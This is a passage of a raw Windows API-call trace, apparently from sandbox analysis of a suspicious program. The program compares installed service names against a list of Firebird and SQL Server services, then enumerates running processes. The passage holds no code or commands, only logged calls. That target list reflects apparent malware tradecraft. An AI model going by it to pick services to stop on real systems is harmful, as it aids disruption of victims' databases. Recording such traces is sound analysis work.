lpString2="AudioEndpointBuilder") returned 1 [0221.019] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0221.019] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0221.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0221.019] lstrlenW (lpString="Audiosrv") returned 8 [0221.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0221.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0221.020] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0221.020] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0221.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0221.020] lstrlenW (lpString="BFE") returned 3 [0221.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0221.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0221.020] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0221.020] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0221.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0221.020] lstrlenW (lpString="BITS") returned 4 [0221.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0221.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0221.020] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0221.020] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0221.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0221.020] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0221.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0221.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0221.020] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0221.020] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0221.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0221.020] lstrlenW (lpString="CDPSvc") returned 6 [0221.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0221.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0221.020] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0221.020] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0221.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0221.020] lstrlenW (lpString="ClickToRunSvc") returned 13 [0221.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0221.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0221.020] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0221.020] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0221.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0221.021] lstrlenW (lpString="ClipSVC") returned 7 [0221.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0221.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0221.021] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0221.021] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0221.021] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0221.021] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0221.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0221.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0221.021] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0221.021] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0221.021] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0221.021] lstrlenW (lpString="CryptSvc") returned 8 [0221.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0221.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0221.021] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0221.021] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0221.021] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0221.021] lstrlenW (lpString="DcomLaunch") returned 10 [0221.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0221.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0221.021] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0221.021] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0221.021] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0221.021] lstrlenW (lpString="DeviceAssociationService") returned 24 [0221.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0221.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0221.021] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0221.021] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0221.021] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0221.021] lstrlenW (lpString="Dhcp") returned 4 [0221.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0221.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0221.021] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0221.021] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0221.021] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0221.021] lstrlenW (lpString="Dnscache") returned 8 [0221.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0221.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0221.022] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0221.022] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0221.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0221.022] lstrlenW (lpString="DoSvc") returned 5 [0221.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0221.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0221.022] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0221.022] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0221.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0221.022] lstrlenW (lpString="DPS") returned 3 [0221.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0221.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0221.022] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0221.022] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0221.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0221.022] lstrlenW (lpString="DusmSvc") returned 7 [0221.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0221.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0221.022] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0221.022] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0221.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0221.022] lstrlenW (lpString="EventLog") returned 8 [0221.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0221.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0221.022] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0221.022] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0221.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0221.022] lstrlenW (lpString="EventSystem") returned 11 [0221.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0221.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0221.022] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0221.022] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0221.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0221.022] lstrlenW (lpString="FontCache") returned 9 [0221.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0221.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0221.023] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0221.023] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0221.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0221.023] lstrlenW (lpString="gpsvc") returned 5 [0221.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0221.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0221.023] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0221.023] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0221.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0221.023] lstrlenW (lpString="iphlpsvc") returned 8 [0221.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0221.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0221.023] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0221.023] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0221.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0221.023] lstrlenW (lpString="KeyIso") returned 6 [0221.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0221.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0221.023] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0221.023] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0221.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0221.023] lstrlenW (lpString="LanmanServer") returned 12 [0221.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0221.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0221.023] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0221.023] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0221.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0221.023] lstrlenW (lpString="LanmanWorkstation") returned 17 [0221.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0221.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0221.023] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0221.023] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0221.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0221.023] lstrlenW (lpString="lfsvc") returned 5 [0221.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0221.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0221.024] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0221.024] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0221.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0221.024] lstrlenW (lpString="LicenseManager") returned 14 [0221.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0221.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0221.024] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0221.024] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0221.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0221.024] lstrlenW (lpString="lmhosts") returned 7 [0221.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0221.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0221.024] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0221.024] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0221.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0221.024] lstrlenW (lpString="LSM") returned 3 [0221.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0221.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0221.024] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0221.024] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0221.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0221.024] lstrlenW (lpString="MpsSvc") returned 6 [0221.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0221.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0221.024] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0221.024] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0221.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0221.024] lstrlenW (lpString="NcbService") returned 10 [0221.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0221.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0221.024] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0221.024] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0221.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0221.024] lstrlenW (lpString="netprofm") returned 8 [0221.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0221.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0221.025] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0221.025] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0221.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0221.025] lstrlenW (lpString="NlaSvc") returned 6 [0221.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0221.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0221.025] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0221.025] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0221.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0221.025] lstrlenW (lpString="nsi") returned 3 [0221.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0221.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0221.025] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0221.025] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0221.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0221.025] lstrlenW (lpString="PcaSvc") returned 6 [0221.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0221.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0221.025] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0221.025] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0221.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0221.025] lstrlenW (lpString="PlugPlay") returned 8 [0221.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0221.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0221.025] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0221.025] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0221.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0221.025] lstrlenW (lpString="Power") returned 5 [0221.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0221.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0221.025] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0221.025] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0221.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0221.025] lstrlenW (lpString="ProfSvc") returned 7 [0221.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0221.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0221.026] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0221.026] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0221.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0221.026] lstrlenW (lpString="RpcEptMapper") returned 12 [0221.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0221.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0221.026] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0221.026] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0221.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0221.026] lstrlenW (lpString="RpcSs") returned 5 [0221.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0221.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0221.026] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0221.026] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0221.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0221.026] lstrlenW (lpString="SamSs") returned 5 [0221.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0221.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0221.026] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0221.026] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0221.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0221.026] lstrlenW (lpString="Schedule") returned 8 [0221.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0221.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0221.026] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0221.026] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0221.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0221.026] lstrlenW (lpString="SecurityHealthService") returned 21 [0221.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0221.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0221.026] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0221.026] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0221.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0221.027] lstrlenW (lpString="SENS") returned 4 [0221.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0221.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0221.027] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0221.027] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0221.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0221.027] lstrlenW (lpString="ShellHWDetection") returned 16 [0221.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0221.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0221.027] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0221.027] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0221.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0221.027] lstrlenW (lpString="Spooler") returned 7 [0221.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0221.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0221.027] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0221.027] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0221.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0221.027] lstrlenW (lpString="sppsvc") returned 6 [0221.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0221.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0221.027] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0221.027] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0221.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0221.027] lstrlenW (lpString="SSDPSRV") returned 7 [0221.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0221.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0221.028] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0221.028] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0221.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x430 [0221.032] Process32FirstW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.033] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.033] lstrlenW (lpString="System") returned 6 [0221.034] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.034] lstrlenW (lpString="smss.exe") returned 8 [0221.034] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.035] lstrlenW (lpString="csrss.exe") returned 9 [0221.035] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.036] lstrlenW (lpString="wininit.exe") returned 11 [0221.036] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.036] lstrlenW (lpString="csrss.exe") returned 9 [0221.037] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.037] lstrlenW (lpString="winlogon.exe") returned 12 [0221.037] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.038] lstrlenW (lpString="services.exe") returned 12 [0221.038] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.039] lstrlenW (lpString="lsass.exe") returned 9 [0221.039] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.039] lstrlenW (lpString="svchost.exe") returned 11 [0221.040] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0221.040] lstrlenW (lpString="fontdrvhost.exe") returned 15 